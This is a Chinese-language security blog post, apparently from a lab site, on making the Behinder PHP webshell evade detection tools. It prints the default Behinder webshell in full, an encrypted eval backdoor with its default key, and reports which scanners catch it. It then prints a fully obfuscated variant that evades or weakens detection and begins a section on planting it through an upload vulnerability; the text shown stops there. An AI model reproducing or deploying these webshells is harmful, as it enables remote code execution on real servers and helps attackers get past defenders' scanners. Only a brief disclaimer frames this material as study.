彌天安全實驗室 - 冰蠍Webshell的免殺實戰（一）－鑽石舞台

網安引領時代，彌天點亮未來

0x00寫在前面

本次測試僅供學習使用，如若非法他用，與平台和本文作者無關，需自行負責！

0x01背景介紹

隨着網絡攻防對抗的愈演愈烈，」查殺「與「免殺」作為對抗最基本的場景。同時webshell作為攻擊者突破網絡邊界的關鍵武器，不論是攻擊者的繞過檢測還防守者的檢測都已經成為兵家必爭之器。

0x02具體操作

以下是冰蠍默認php環境下的webshell文件

<?php@error_reporting(0);session_start();$key="e45e329feb5d925b"; //該密鑰為連接密碼32位md5值的前16位，默認連接密碼rebeyond$SESSION['k']=$key;session_write_close();$post=file_get_contents("php://input");if(!extension_loaded('openssl')){$t="base64"."decode";$post=$t($post.""); for($i=0;$i<strlen($post);$i++) { $post[$i] = $post[$i]^$key[$i+1&15]; }}else{ $post=openssl_decrypt($post, "AES128", $key);}$arr=explode('|',$post);$func=$arr[0];$params=$arr[1];class C{public function __invoke($p) {eval($p."");}}@call_user_func(new C(),$params);?>

通過webshell 查殺工具進行檢測，結果如下：

D盾檢測（可檢測）

冰河檢測（可檢測）

阿里伏魔（可檢測）

免殺處理

通過使用常見的方式進行免殺處理，一般對於安全狗殺形，d盾殺參的思路來繞過。生僻的回調函數,特殊的加密方式,以及關鍵詞的後傳入都是可以的。

下面通過對php馬進行混淆參數、加密等方式進行免殺處理。

https://enphp.djunny.com/

1.將冰蠍默認的webshell上傳到平台。

2.選擇混淆的參數，這裡全選

3.點擊加密，生成免殺後的webshell（每次生成都不一樣，有時會解析出問題）

接下來進行免殺測試

D盾檢測（可疑）

冰河檢測（免殺）

阿里伏魔檢測（風險）

這裡是免殺馬內容，感覺亂七八糟的

<?php/*yunzui*/goto ½ÎÃÏ;¨êãâ:function ˆšî(){goto Ö「Âý;íÒÈÛ:return((parse_str("®íñš=Y2FsbF91c2VyX2Z1bmM",$õþõ±)||$õþõ±)?base64_decode($õþõ±['®íñš']):"");goto ñæ¦ì;ñæ¦ì:±íúÂ:goto ô«—˜;ó®æ¢:$Š³ñ『=0x00026a9;goto ŠÓ』õ;ŠÓ』õ:if(!($„「ý[0]==$Š³ñ『+0x0024))goto ±íúÂ;goto íÒÈÛ;Ö「Âý:$„「ý=func_get_args();goto ó®æ¢;ô«—˜:}goto ßÑ;Í²」°:goto ÔŸ¶õ;goto ÅØ»ô;»Œ¶Ô:class C{public function __invoke($´€¼À){eval($´€¼À.base64_decode(str_rot13('')));}}goto ¹Ôœ·;ž–™:ÔŸ¶õ:goto °ËüÉ;ÅØ»ô:Ý²÷:goto ™µý¼;Û®ˆ:$Ö€Ï=˜ò(0x000d95,0x00da8,0x0000d73)(˜ò(0x00df3,0x00000dce));goto ¶Á;ËºÚë:$ðè¬ƒ=˜ò(0x00d08,$ðè¬ƒ);goto û»‰;¡ÐÈ—:$Ö€Ï=$‰óÔ($Ö€Ï.((parse_str("–õ¿×=",$¥¨ýÊ)||$¥¨ýÊ)?base64_decode($¥¨ýÊ['–õ¿×']):""));goto ³òäÝ;™µý¼:ûãýË:goto æ「‡;ßÑ:function ÃŒûƒ(){goto Òé¿€;ÁŒíÇ:return((parse_str("c3RybGVu",$Ãò²¶)||$Ãò²¶)?base64_decode(key($Ãò²¶)):"");goto ãáÚ;÷ãµ¸:ÍØËÎ:goto Ýžº¤;『´¿Â:if(!($¯‡¬Æ[0x0002]==$©¢Ì+0x00061))goto µž×ì;goto áî®§;ÆÙâã:$©¢Ì=0x0240e;goto ÖÚï½;ðÁ¯¬:µž×ì:goto ¯ÎÒ×;áî®§:return(base64_decode('b3BlbnNzbF9kZWNyeXB0')?:$×˜Õ£);goto ðÁ¯¬;¬¹•Ž:if(!($¯‡¬Æ[0x001]==$©¢Ì+0x000013e))goto ßîÛñ;goto ——¹™;ÁÁÓì:return((parse_str("‡¡Ž=ZXhwbG9kZQ",$ÑÛÚû)||$ÑÛÚû)?base64_decode($ÑÛÚû['‡¡Ž']):"");goto 』²óŒ;ÖÚï½:if(!($¯‡¬Æ[0x001]==$©¢Ì+0x02d))goto Áã¤ˆ;goto ÁŒíÇ;øôÜÎ:return base64_decode(str_rot13('DHIGZGV4'));goto ÷ãµ¸;——¹™:return "\x7c";goto ÍÌ–ƒ;ãáÚ:Áã¤ˆ:goto 『´¿Â;¯ÎÒ×:if(!($¯‡¬Æ[0x001]==$©¢Ì+0x0000b7))goto ÍØËÎ;goto øôÜÎ;』²óŒ:¿Ïˆ:goto ¬¹•Ž;Òé¿€:$¯‡¬Æ=func_get_args();goto ÆÙâã;ÍÌ–ƒ:ßîÛñ:goto Ýˆ·¦;Ýžº¤:if(!($¯‡¬Æ[0x001]==$©¢Ì+0x00000f9))goto ¿Ïˆ;goto ÁÁÓì;Ýˆ·¦:}goto ‹âãÄ;Ûžªö:@˜ò(0x000cf5)(0);goto ÑË˜;±ëéˆ:$¾¶è¼=$Œåò„[0];goto Üí©;°ËüÉ:if(!($›•Å•<ÃŒûƒ(0x002450,0x0243b)($Ö€Ï)))goto Ý²÷;goto çÈŸÞ;çÈŸÞ:$Ö€Ï[$›•Å•]=$Ö€Ï[$›•Å•]^$ðè¬ƒ[$›•Å•+0x001&0x0f];goto ©è³±;´©ú§:¸Õï:goto ·¸¶†;ÁÜÁ·:$›•Å•++;goto Í²」°;‹âãÄ:function ûú¥ó(){goto Èµ¢ý;ÊÑ¼Á:return gzinflate('K(IÍ+ÎÌÏ‹ÏÉOLIM�');goto õÕ·å;ôÙ:return base64_decode(join("",array('Y','m','F','z','Z','T','Y','0','X','w')));goto õ¯¶›;¦¬û:if(!($äˆýÆ[0]==$¤üì˜+0x037))goto ï』è;goto æÝ」;ÖÝŠÂ:$¤üì˜=0x00000e00;goto ¤—ïÁ;õÕ·å:îß¤」:goto ¦¬û;õ¯¶›:œ¬‹Ï:goto ½ô¥;¶ŸÁ¹:—ä§†:goto ú¨ï«;Èµ¢ý:$äˆýÆ=func_get_args();goto ÖÝŠÂ;½ô¥:if(!($äˆýÆ[0]==$¤üì˜+0x000006d))goto —ä§†;goto ë『¨ˆ;æÝ」:return gzinflate('Ë/HÍ+.Î�');goto ‚™œ;¤—ïÁ:if(!($äˆýÆ[0]==$¤üì˜+0x0015))goto îß¤」;goto ÊÑ¼Á;»ïÊÃ:if(!($äˆýÆ[0]==$¤üì˜+0x004c))goto œ¬‹Ï;goto ôÙ;‚™œ:ï』è:goto »ïÊÃ;ë『¨ˆ:return base64_decode(join("",array('Z','G','V','j','b','2','R','l')));goto ¶ŸÁ¹;ú¨ï«:}goto „è›Ø;„„éŽ:˜ò(0x00000d51)();goto Û®ˆ;„è›Ø:function ˜ò(){goto µ¾ýö;µ¢Ü·:return base64_decode('ZTQ1ZTMyOWZlYjVkOTI1Yg');goto Š„Ä;ßµ–Ì:Šõ‡ö:goto ™ŠÂ²;ÎÀ°Ä:return(($½šÒ·=gzinflate(substr(base64_decode('H4sIAAAAAAAAA0stKsovii9KLcgvKsnMSwcAF20hmA8AAAA'),10,-8)))?$½šÒ·:$ØÒš);goto î°¥¬;¾œóœ:if(!($½「â[0x001]==$」Ý¸‚+0x000049))goto ™ý¥î;goto ¾Ú˜Ô;」ÁÄ©:if(!($½「â[0x001]==$」Ý¸‚+0x00100))goto ©ÂÛý;goto ‰É£Ä;âŽÕ×:if(!($½「â[0]==$」Ý¸‚+0x00003a))goto ÚÈ¥ƒ;goto µ¢Ü·;å¦¥Þ:if(!($½「â[0]==$」Ý¸‚+0x0000027))goto ëß©Þ;goto ÎÀ°Ä;µ¾ýö:$」Ý¸‚=0x0000cce;goto µúÓ;µúÓ:$½「â=func_get_args();goto å¦¥Þ;‰É£Ä:return(($«º「¥=gzinflate(substr(base64_decode('H4sIAAAAAAAAAyvIKLDS18/MKygtAQCnED5iCwAAAA'),10,-8)))?$«º「¥:$Èßú);goto é™¿;¢ìµ®:if(!($½「â[0]==$」Ý¸‚+0x0083))goto Šõ‡ö;goto ª»Š¤;¾Ú˜Ô:return(($「『Ûã=gzinflate(substr(base64_decode('H4sIAAAAAAAAA8sGAF1XYggBAAAA'),10,-8)))?$「『Ûã:$ÂüœÇ);goto æÀØ€;é™¿:©ÂÛý:goto €–¾ô;Ø€ø:return base64_decode(join("",array('Z','m','l','s','Z','V','9','n','Z','X','R','f','Y','2','9','u','d','G','V','u','d','H','M')));goto Íœ–Ä;æÀØ€:™ý¥î:goto ¢ìµ®;Š„Ä:ÚÈ¥ƒ:goto ¾œóœ;ª»Š¤:return((parse_str("c2Vzc2lvbl93cml0ZV9jbG9zZQ",$¥』‚É)||$¥』‚É)?base64_decode(key($¥』‚É)):"");goto ßµ–Ì;™ŠÂ²:if(!($½「â[0x0002]==$」Ý¸‚+0x0a5))goto Ï¹àÆ;goto Ø€ø;î°¥¬:ëß©Þ:goto âŽÕ×;Íœ–Ä:Ï¹àÆ:goto 」ÁÄ©;€–¾ô:}goto Ûžªö;½ÎÃÏ:error_reporting(0);goto ¨êãâ;·¸¶†:$‰óÔ=ûú¥ó(0x0e4c).ûú¥ó(0x0000e6d);goto ¡ÐÈ—;æ「‡:$Œåò„=ÃŒûƒ(0x00000252f,0x000002507)(ÃŒûƒ(0x000257d,0x0000254c),$Ö€Ï);goto ±ëéˆ;ÉöèØ:goto ûãýË;goto ´©ú§;Üí©:$·ø¬Ý=$Œåò„[0x001];goto »Œ¶Ô;ÑË˜:session_start();goto ËºÚë;û»‰:$_SESSION[˜ò(0x00d21,0x00d17)]=$ðè¬ƒ;goto „„éŽ;³òäÝ:$›•Å•=0;goto ž–™;¶Á:if(!ûú¥ó(0x0e15)(ûú¥ó(0x00000e37)))goto ¸Õï;goto ´ŸÍš;´ŸÍš:$Ö€Ï=ÃŒûƒ(0x00249b,0x0024b4,0x000246f)($Ö€Ï,ÃŒûƒ(0x00024f6,0x000024c5),$ðè¬ƒ);goto ÉöèØ;©è³±:êÓ›à:goto ÁÜÁ·;¹Ôœ·:@ˆšî(0x000026cd)(new C(),$·ø¬Ý);

利用上傳漏洞進行實戰

1.通過信息收集發現目標存在漏洞，上傳免殺wesbell並進行解析